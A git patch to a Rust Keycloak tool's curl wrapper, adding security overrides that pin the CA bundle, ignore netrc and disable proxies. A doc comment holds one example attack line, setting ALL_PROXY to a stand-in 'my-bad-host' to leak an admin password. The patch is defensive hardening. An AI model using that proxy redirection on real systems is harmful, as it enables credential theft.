From b660956c4f765884339ad37268b18436653daf3d Mon Sep 17 00:00:00 2001 From: javalsai Date: Mon, 11 May 2026 03:02:02 +0200 Subject: [PATCH] security: override CURL env parameters --- src/keycloak/mycurl/mod.rs | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/src/keycloak/mycurl/mod.rs b/src/keycloak/mycurl/mod.rs index b5db3fe..2f46ba5 100644 --- a/src/keycloak/mycurl/mod.rs +++ b/src/keycloak/mycurl/mod.rs @@ -49,6 +49,21 @@ pub struct Response { } impl Client { + /// Adds defalt options that can be env overriden in untrsuted environments to leak information. + /// + /// E.g. `ALL_PROXY=http://my-bad-host/ passwd` leaks admins password without this. + /// + /// Check: + /// - + pub fn add_security_overrides(easy: &mut Easy) -> Result<(), curl::Error> { + easy.cainfo("/etc/ssl/certs/ca-bundle.crt")?; + easy.netrc(curl::easy::NetRc::Ignored)?; + // + easy.noproxy("*")?; + + Ok(()) + } + pub fn add_headers(easy: &mut Easy, headers: &[&str]) -> Result<(), curl::Error> { let mut curl_headers = List::new(); @@ -121,6 +136,7 @@ impl Client { let mut easy = Easy::new(); let client = &mut easy; + Self::add_security_overrides(client)?; Self::add_headers(client, headers)?; client.url(uri)?; Self::set_method_and_body(client, method)?;